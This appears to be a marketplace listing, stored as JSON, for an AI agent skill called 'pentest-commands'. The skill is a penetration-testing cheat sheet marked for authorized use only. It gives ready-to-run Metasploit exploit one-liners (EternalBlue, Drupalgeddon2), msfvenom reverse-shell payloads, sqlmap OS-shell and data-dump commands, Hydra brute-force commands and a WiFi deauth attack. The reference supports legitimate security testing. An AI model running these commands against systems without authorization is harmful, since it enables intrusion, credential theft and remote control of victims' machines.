[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-1b2813a8-67bd-44a2-96bd-c3d3b7bb65b4":3,"$fa-YCsaND6dsZ_l8hSNZUNIfbeUTrUbTK7QCzrwPxv9Q":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"1b2813a8-67bd-44a2-96bd-c3d3b7bb65b4","pentest-commands","Provides a comprehensive command reference for penetration testing tools, including network scanning, exploitation, password cracking, and web application testing. Enables quick command lookup during security assessments.","cat_coding_review","mod_coding","sickn33,coding","---\nname: pentest-commands\ndescription: \"Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# Pentest Commands\n\n## Purpose\n\nProvide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.\n\n## Inputs\u002FPrerequisites\n\n- Kali Linux or penetration testing distribution\n- Target IP addresses with authorization\n- Wordlists for brute forcing\n- Network access to target systems\n- Basic understanding of tool syntax\n\n## Outputs\u002FDeliverables\n\n- Network enumeration results\n- Identified vulnerabilities\n- Exploitation payloads\n- Cracked credentials\n- Web vulnerability findings\n\n## Core Workflow\n\n### 1. 
Nmap Commands\n\n**Host Discovery:**\n\n```bash\n# Ping sweep\nnmap -sP 192.168.1.0\u002F24\n\n# List IPs without scanning\nnmap -sL 192.168.1.0\u002F24\n\n# Ping scan (host discovery)\nnmap -sn 192.168.1.0\u002F24\n```\n\n**Port Scanning:**\n\n```bash\n# TCP SYN scan (stealth)\nnmap -sS 192.168.1.1\n\n# Full TCP connect scan\nnmap -sT 192.168.1.1\n\n# UDP scan\nnmap -sU 192.168.1.1\n\n# All ports (1-65535)\nnmap -p- 192.168.1.1\n\n# Specific ports\nnmap -p 22,80,443 192.168.1.1\n```\n\n**Service Detection:**\n\n```bash\n# Service versions\nnmap -sV 192.168.1.1\n\n# OS detection\nnmap -O 192.168.1.1\n\n# Comprehensive scan\nnmap -A 192.168.1.1\n\n# Skip host discovery\nnmap -Pn 192.168.1.1\n```\n\n**NSE Scripts:**\n\n```bash\n# Vulnerability scan\nnmap --script vuln 192.168.1.1\n\n# SMB enumeration\nnmap --script smb-enum-shares -p 445 192.168.1.1\n\n# HTTP enumeration\nnmap --script http-enum -p 80 192.168.1.1\n\n# Check EternalBlue\nnmap --script smb-vuln-ms17-010 192.168.1.1\n\n# Check MS08-067\nnmap --script smb-vuln-ms08-067 192.168.1.1\n\n# SSH brute force\nnmap --script ssh-brute -p 22 192.168.1.1\n\n# FTP anonymous\nnmap --script ftp-anon 192.168.1.1\n\n# DNS brute force\nnmap --script dns-brute 192.168.1.1\n\n# HTTP methods\nnmap -p80 --script http-methods 192.168.1.1\n\n# HTTP headers\nnmap -p80 --script http-headers 192.168.1.1\n\n# SQL injection check\nnmap --script http-sql-injection -p 80 192.168.1.1\n```\n\n**Advanced Scans:**\n\n```bash\n# Xmas scan\nnmap -sX 192.168.1.1\n\n# ACK scan (firewall detection)\nnmap -sA 192.168.1.1\n\n# Window scan\nnmap -sW 192.168.1.1\n\n# Traceroute\nnmap --traceroute 192.168.1.1\n```\n\n### 2. 
Metasploit Commands\n\n**Basic Usage:**\n\n```bash\n# Launch Metasploit\nmsfconsole\n\n# Search for exploits\nsearch type:exploit name:smb\n\n# Use exploit\nuse exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue\n\n# Show options\nshow options\n\n# Set target\nset RHOST 192.168.1.1\n\n# Set payload\nset PAYLOAD windows\u002Fmeterpreter\u002Freverse_tcp\n\n# Run exploit\nexploit\n```\n\n**Common Exploits:**\n\n```bash\n# EternalBlue\nmsfconsole -x \"use exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue; set RHOST 192.168.1.1; exploit\"\n\n# MS08-067 (Conficker)\nmsfconsole -x \"use exploit\u002Fwindows\u002Fsmb\u002Fms08_067_netapi; set RHOST 192.168.1.1; exploit\"\n\n# vsftpd backdoor\nmsfconsole -x \"use exploit\u002Funix\u002Fftp\u002Fvsftpd_234_backdoor; set RHOST 192.168.1.1; exploit\"\n\n# Shellshock\nmsfconsole -x \"use exploit\u002Flinux\u002Fhttp\u002Fapache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit\"\n\n# Drupalgeddon2\nmsfconsole -x \"use exploit\u002Funix\u002Fwebapp\u002Fdrupal_drupalgeddon2; set RHOST 192.168.1.1; exploit\"\n\n# PSExec\nmsfconsole -x \"use exploit\u002Fwindows\u002Fsmb\u002Fpsexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit\"\n```\n\n**Scanners:**\n\n```bash\n# TCP port scan\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Fportscan\u002Ftcp; set RHOSTS 192.168.1.0\u002F24; run\"\n\n# SMB version scan\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Fsmb\u002Fsmb_version; set RHOSTS 192.168.1.0\u002F24; run\"\n\n# SMB share enumeration\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Fsmb\u002Fsmb_enumshares; set RHOSTS 192.168.1.0\u002F24; run\"\n\n# SSH brute force\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Fssh\u002Fssh_login; set RHOSTS 192.168.1.0\u002F24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run\"\n\n# FTP brute force\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Fftp\u002Fftp_login; set RHOSTS 192.168.1.0\u002F24; set USER_FILE users.txt; set PASS_FILE 
passwords.txt; run\"\n\n# RDP scanning\nmsfconsole -x \"use auxiliary\u002Fscanner\u002Frdp\u002Frdp_scanner; set RHOSTS 192.168.1.0\u002F24; run\"\n```\n\n**Handler Setup:**\n\n```bash\n# Multi-handler for reverse shells\nmsfconsole -x \"use exploit\u002Fmulti\u002Fhandler; set PAYLOAD windows\u002Fmeterpreter\u002Freverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit\"\n```\n\n**Payload Generation (msfvenom):**\n\n```bash\n# Windows reverse shell\nmsfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe\n\n# Linux reverse shell\nmsfvenom -p linux\u002Fx64\u002Fshell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf\n\n# PHP reverse shell\nmsfvenom -p php\u002Freverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php\n\n# ASP reverse shell\nmsfvenom -p windows\u002Fshell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp\n\n# WAR file\nmsfvenom -p java\u002Fjsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war\n\n# Python payload\nmsfvenom -p cmd\u002Funix\u002Freverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py\n```\n\n### 3. Nikto Commands\n\n```bash\n# Basic scan\nnikto -h http:\u002F\u002F192.168.1.1\n\n# Comprehensive scan\nnikto -h http:\u002F\u002F192.168.1.1 -C all\n\n# Output to file\nnikto -h http:\u002F\u002F192.168.1.1 -output report.html\n\n# Plugin-based scans\nnikto -h http:\u002F\u002F192.168.1.1 -Plugins robots\nnikto -h http:\u002F\u002F192.168.1.1 -Plugins shellshock\nnikto -h http:\u002F\u002F192.168.1.1 -Plugins heartbleed\nnikto -h http:\u002F\u002F192.168.1.1 -Plugins ssl\n\n# Export to Metasploit\nnikto -h http:\u002F\u002F192.168.1.1 -Format msf+\n\n# Specific tuning\nnikto -h http:\u002F\u002F192.168.1.1 -Tuning 1  # Interesting files only\n```\n\n### 4. 
SQLMap Commands\n\n```bash\n# Basic injection test\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\"\n\n# Enumerate databases\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" --dbs\n\n# Enumerate tables\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" -D database --tables\n\n# Dump table\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" -D database -T users --dump\n\n# OS shell\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" --os-shell\n\n# POST request\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Flogin\" --data=\"user=admin&pass=test\"\n\n# Cookie injection\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage\" --cookie=\"id=1*\"\n\n# Bypass WAF\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" --tamper=space2comment\n\n# Risk and level\nsqlmap -u \"http:\u002F\u002F192.168.1.1\u002Fpage?id=1\" --risk=3 --level=5\n```\n\n### 5. Hydra Commands\n\n```bash\n# SSH brute force\nhydra -l admin -P \u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt ssh:\u002F\u002F192.168.1.1\n\n# FTP brute force\nhydra -l admin -P \u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt ftp:\u002F\u002F192.168.1.1\n\n# HTTP POST form\nhydra -l admin -P passwords.txt 192.168.1.1 http-post-form \"\u002Flogin:user=^USER^&pass=^PASS^:Invalid\"\n\n# HTTP Basic Auth\nhydra -l admin -P passwords.txt 192.168.1.1 http-get \u002Fadmin\u002F\n\n# SMB brute force\nhydra -l admin -P passwords.txt smb:\u002F\u002F192.168.1.1\n\n# RDP brute force\nhydra -l admin -P passwords.txt rdp:\u002F\u002F192.168.1.1\n\n# MySQL brute force\nhydra -l root -P passwords.txt mysql:\u002F\u002F192.168.1.1\n\n# Username list\nhydra -L users.txt -P passwords.txt ssh:\u002F\u002F192.168.1.1\n```\n\n### 6. 
John the Ripper Commands\n\n```bash\n# Crack password file\njohn hash.txt\n\n# Specify wordlist\njohn hash.txt --wordlist=\u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt\n\n# Show cracked passwords\njohn hash.txt --show\n\n# Specify format\njohn hash.txt --format=raw-md5\njohn hash.txt --format=nt\njohn hash.txt --format=sha512crypt\n\n# SSH key passphrase\nssh2john id_rsa > ssh_hash.txt\njohn ssh_hash.txt --wordlist=\u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt\n\n# ZIP password\nzip2john file.zip > zip_hash.txt\njohn zip_hash.txt\n```\n\n### 7. Aircrack-ng Commands\n\n```bash\n# Monitor mode\nairmon-ng start wlan0\n\n# Capture packets\nairodump-ng wlan0mon\n\n# Target specific network\nairodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon\n\n# Deauth attack\naireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon\n\n# Crack WPA handshake\naircrack-ng -w \u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt capture-01.cap\n```\n\n### 8. Wireshark\u002FTshark Commands\n\n```bash\n# Capture traffic\ntshark -i eth0 -w capture.pcap\n\n# Read capture file\ntshark -r capture.pcap\n\n# Filter by protocol\ntshark -r capture.pcap -Y \"http\"\n\n# Filter by IP\ntshark -r capture.pcap -Y \"ip.addr == 192.168.1.1\"\n\n# Extract HTTP data\ntshark -r capture.pcap -Y \"http\" -T fields -e http.request.uri\n```\n\n## Quick Reference\n\n### Common Port Scans\n\n```bash\n# Quick scan\nnmap -F 192.168.1.1\n\n# Full comprehensive\nnmap -sV -sC -A -p- 192.168.1.1\n\n# Fast with version\nnmap -sV -T4 192.168.1.1\n```\n\n### Password Hash Types\n\n| Hashcat mode | Type |\n|--------------|------|\n| 0 | MD5 |\n| 100 | SHA1 |\n| 1000 | NTLM |\n| 1800 | sha512crypt |\n| 3200 | bcrypt |\n| 13100 | Kerberoast |\n\n## Constraints\n\n- Always have written authorization\n- Some scans are noisy and detectable\n- Brute forcing may lock accounts\n- Rate limiting affects tools\n\n## Examples\n\n### Example 1: Quick Vulnerability Scan\n\n```bash\nnmap -sV --script vuln 192.168.1.1\n```\n\n### Example 2: 
Web App Test\n\n```bash\nnikto -h http:\u002F\u002Ftarget && sqlmap -u \"http:\u002F\u002Ftarget\u002Fpage?id=1\" --dbs\n```\n\n## Troubleshooting\n\n| Issue | Solution |\n|-------|----------|\n| Scan too slow | Increase timing (-T4, -T5) |\n| Ports filtered | Try different scan types |\n| Exploit fails | Check target version compatibility |\n| Passwords not cracking | Try larger wordlists, rules |\n\n## When to Use\nUse this skill to carry out the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,141,203,"2026-05-16 13:33:38",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"Programming and Development","coding","mdi-code-braces","Code generation, debugging, and review to improve development efficiency",2,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"Code Review","review","mdi-magnify-scan","Code quality analysis and security review",4,145,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"2d9a2fc5-194b-4362-b50b-bb1a3581bbb5","1.0.0","pentest-commands.zip",3260,"uploads\u002Fskills\u002F1b2813a8-67bd-44a2-96bd-c3d3b7bb65b4\u002Fpentest-commands.zip","132f16f35a909752ce3ae3c8f06b8eaaded9d0f33134d56eb22e38a58d6b33c0","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":9639}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]